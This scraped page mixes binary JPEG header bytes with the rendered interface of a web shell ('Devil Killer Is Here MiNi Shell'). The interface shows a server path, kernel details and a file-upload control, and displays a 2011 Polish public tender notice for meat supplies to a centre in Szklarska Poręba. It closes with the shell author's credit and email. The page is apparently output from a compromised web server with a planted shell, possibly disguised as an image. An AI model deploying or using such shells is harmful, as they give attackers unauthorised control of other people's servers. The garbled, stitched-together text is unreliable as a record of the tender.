JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111106/366366-N-2011.html

<p class="kh_header"><b>Szklarska Poręba: Dostawa mięsa i jego przetworów 
dla 
Centrum Usług Logistycznych
Zespół Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie</b><br>
<b>Numer ogłoszenia: 366366 - 2011; data zamieszczenia: 06.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Usług Logistycznych Zespół Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie , ul. 1 Maja 62, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 75 717 20 26, faks 75 717 23 96.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.olimp-rzemieslnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: INSTYTUCJA GOSPODARKI BUDŻETOWEJ.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i jego przetworów 
dla 
Centrum Usług Logistycznych
Zespół Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mięsa, wędlin i drobiu dla Centrum Usług Logistycznych Zespołu Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie.
Dostawy objęte przedmiotem zamówienia winny być świadczone niezależnie od warunków  pogodowych, codziennie, na telefoniczne zgłoszenie Zamawiającego. Dopuszcza się złożenie zamówienia faksem lub e-mailem. Zamówienie realizowane ma być na drugi dzień po telefonicznym zamówieniu towaru przez upoważnionego przedstawiciela Zamawiającego. Dostarczanie przedmiotu zamówienia winno odbywać się na ryzyko i koszt własny wykonawcy, własnym specjalistycznym transportem zgodnie z obowiązującym prawem i zasadami dobrej praktyki higienicznej. Wszelkie koszty wydania przedmiotu umowy, w szczególności koszty opakowania, przesyłania, załadunku, rozładunku i ubezpieczenia ponosi Wykonawca.  Dostawa następować będzie w dni powszednie od  poniedziałku do piątku w godzinach od 7:00 do 15:00. Dostarczany asortyment musi być świeży i spełniać wymogi jakościowe dotycząc wytwarzania, przechowywania i transportu produktów żywnościowych w systemie kontroli HACCP. Wszystkie 	wyroby objęte niniejszym postępowaniem (każda dostawa) muszą posiadać czytelne, trwałe metki z nazwą producenta, datą produkcji, wagą, datą przydatności do spożycia i nazwą dostarczonego wyrobu. Wymagane terminy przydatności do spożycia: mięso świeże w terminem przydatności min. 3 dni, mięso pakowane próżniowo z terminem przydatności min. 7 dni, wędliny pakowane próżniowo z terminem przydatności do spożycia min. 10 dni.

NAZWA TOWARU     NORMA     OPIS     SZACUNKOWA WIELKOŚĆ ZAMÓWIENIA W KG
1. karkówka wieprzowa bez kości, PN-86/A-82002, całkowicie odkostniona, słonina całkowicie zdjęta, 1440 kg
2.łopatka wieprzowa bez kości, PN-86/A-82002, mięso odtłuszczone, całkowicie odkostnione, 1920 kg
3. podgardle surowe, PN-86/A-82002, mięso odkostnione, 120 kg
4. schab z kością i polędwicą, PN-86/A-82002, słonina ze schabu zdjęta, 1800  kg
5. żeberka wieprzowe mięsne ,PN-86/A-82002, żeberka o niewielkim przeroście tłuszczowym, zawartością min. 5 cm mięsa nad kością, 600 kg
6. boczek surowy chudy, PN-86/A-82002, nie mrożony spełniający wymagania normy, 60kg
7. kurczak świeży cały, PN-92/A-86521, waga jednostkowa ok. 1,5 kg - 2,5 kg, 60 kg
8. filet z piersi z kurczaka świeżego, PN-92/A-86521, płaty pojedyncze lub podwójne, bez przylegającej skóry, 1200 kg
9. udka kurczaka świeże, PN-92/A-86521, pałka z udźcem bez korpusu waga 250-300 g., 960 kg
10. porcje rosołowe z kurczaka, PN-92/A-86521, porcja rosołowa z szyją, 480 kg
11. skrzydełka z kurczaka, PN-92/A-86521, skrzydełka z kawałkiem mięsa z przeznaczeniem  na grilla, 420 kg
12. wołowina pieczeniowa, PN-88/A-82003, wołowina ekstra zrazowa bez kości, może być antrykot wołowy bez kości, 300kg
13. filet drobiowy faszerowany, PN-92/A-86521, Rolada z fileta drobiowego faszerowana , zawartość mięsa drobiowego: min. 50%, 180kg
14. szynka z indyka, PN-92/A-86521, może być polędwica z indyka  wędzona, lekko rozdrobniona, parzona, zawartość mięsa drobiowego: min. 40 %, 180 kg
15. polędwica drobiowa, PN-92/A-86521
Polędwica z kurczaka  wędzona, lekko rozdrobniona, parzona, zawartość mięsa drobiowego: min. 40 %, 120kg
16. szynka drobiowa, PN-A-82007, podwędzana, wyprodukowana z surowca drobiowego  grubo rozdrobnionego, z dodatkiem przypraw, gotowana, nieprasowana, zawartość mięsa drobiowego: min. 40 %,  180 kg
17. wędzonka indycza, PN-92/A-86521, pierś z indyka, nie mielona, wędzona, zawartość mięsa drobiowego: min. 60 %, 120 kg
18. parówka drobiowa podwędzana, PN-92/A-86521, Drobno rozdrobniona homogenizowana, wędzona, parzona, zawartość mięsa drobiowego: min. 30 %, 360 kg
19. serdelki drobiowe, PN-92/A-86521, Drobno rozdrobniona homogenizowana, wędzona, parzona, zawartość mięsa drobiowego: min 30 %, długość do 9 cm., 480kg
20. galantyna z drobiu, PN-92/A-86521, mięso drobiowe w galarecie, formowane w formie rolady, zawartość mięsa drobiowego: min. 50 %, 180 kg
21. pasztet pieczony drobiowy, PN-92/A-86521, pasztet pieczony z mięsa drobiowego, pieczony w piecu w foremkach, zawartość mięsa drobiowego min. 60%, 180 kg
22. baleron gotowany, PN-A-82007, wędzonka wieprzowa, zawartość mięsa wieprzowego: min. 70 %, 300 kg
23. boczek wędzony, PN-A-82007, łuskany, parzony, chudy, spełniający normę tłuszczu dla boczku bez żeberek, zawartość mięsa wieprzowego: min. 80 %, 360kg
24. kiełbasa biała parzona , PN-A-82007 , Parzona, zawartość mięsa wieprzowego: min. 50 %, 120 kg
25. kiełbasa biała surowa, PN-A-82007, Surowa, zawartość mięsa wieprzowego: min. 50 %, 120 kg
26. kiełbasa krakowska parzona, PN-A-82007, grubo rozdrobniona, wyprodukowana z peklowanego mięsa wieprzowego, wędzona, parzona, zawartość mięsa min. 70 %, 600kg
27. kiełbasa śląska , PN-A-82007, kiełbasa średniorozdrobniona, wyprodukowana z peklowanego mięsa wieprzowego, wędzona, parzona, zawartość mięsa wieprzowego min. 40 %, kalibrowana na 100-130 g., 840 kg
28. kiełbasa szynkowa, PN-A-82007, kiełbasa grubo rozdrobniona czysto wieprzowa, wędzona, parzona, zawartość mięsa wieprzowego min. 65 %, 600 kg
29.łopatka gotowana, PN-A-82007, porcja mięsa nierozdrobniona, peklowana, gotowana, podwędzana, zawartość mięsa min. 50 %, 180 kg
30. ogonówka, PN-A-82007, porcja mięsa nierozdrobniona, peklowana, gotowana, podwędzana, zawartość mięsa min. 70 %, 420kg
31. pieczeń a ala kaczka, PN-A-82007, mieszanka mięsa mielonego, wyprodukowana z mięsa, pieczona, zawartość mięsa min. 20 %, 120 kg
32. parówki wieprzowe, PN-A-82007, Drobno rozdrobniona homogenizowana, wędzona, parzona, zawartość mięsa wieprzowego  min 30 %, 840 kg
33. pasztet pieczony wieprzowy, PN-A-82007, mieszanka mięsa mielonego, wyprodukowana z mięsa wieprzowego pieczona, zawartość mięsa min. 60 %, 120 kg
34. polędwica sopocka, PN-A-82007, wyrób wieprzowy o zachowanej strukturze tkankowej, parzony, wędzonka wieprzowa, zawartość mięsa wieprzowego min. 75 %, 240kg
35. szynka konserwowa, PN-A-82007
szynka konserwowa wieprzowa, formowana w kształcie bloku, wyrób parzony grubomielony, zawartość mięsa wieprzowego min. 55 %, 720kg
36. szynka wieprzowa gotowana, PN-A-82007, szynka wieprzowa,  wędzona, parzona, zawartość mięsa wieprzowego min. 75 %, 300kg
37. szynka wiejska, PN-A-82007, skład: mięso szynki wieprzowej 75 %, z cienką warstwą tłuszczu, wędzony , parzony, 300 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (tekst jednolity z 2010 r. Dz. U. Nr 113, poz. 759 z pózn. zm.), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz art. 22 ustawy prawo Zamówień Publicznych. 
Zamawiający uzna warunki określone w art. 22 ust. 1 ustawy za spełnione jeżeli wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, należycie wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej jedną dostawę odpowiadającą przedmiotowi zamówienia o wartości min. 50 tysięcy netto rocznie.

Zamawiający, na podstawie złożonych przez Wykonawcę dokumentów dokona oceny spełnienia warunków przedmiotowych. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem  Wykonawcy, a ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Rabat udzielony na pozostałe asortyment nie wyszczególniony w formularzu cenowym - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olimp-rzemieslnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Usług Logistycznych
Zespół Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie, 
ul. 1 Maja 62, 58-580 Szklarska Poręba.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 09:00, miejsce: Centrum Usług Logistycznych
Zespół Ośrodków Szkoleniowo-Wypoczynkowych w Szklarskiej Porębie, 
ul. 1 Maja 62, 58-580 Szklarska Poręba 
punkt: recepcja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com